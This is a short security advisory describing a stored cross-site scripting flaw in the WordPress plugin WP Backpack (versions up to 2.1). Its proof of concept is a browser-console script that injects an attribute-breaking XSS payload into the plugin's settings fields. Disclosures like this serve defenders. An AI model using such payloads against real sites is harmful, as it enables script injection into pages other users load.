WP Backpack <= 2.1 - Admin+ Stored XSS

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

PoC

1. Go to https://example.com/wp-admin/admin.php?page=optik 2. In the browser console, run the code: let inputs = document.querySelectorAll( '#wpbody-content input[type="text"]' ); inputs.forEach( (element) => element.value=`" style=animation-name:rotation onanimationstart=alert(/XSS: ${element.name}/)//` );let textareas = document.querySelectorAll( '#wpbody-content textarea' ); textareas.forEach( (element) => element.value=`` ); 3. Save the settings 4. Reload the page and see multiple XSS alerts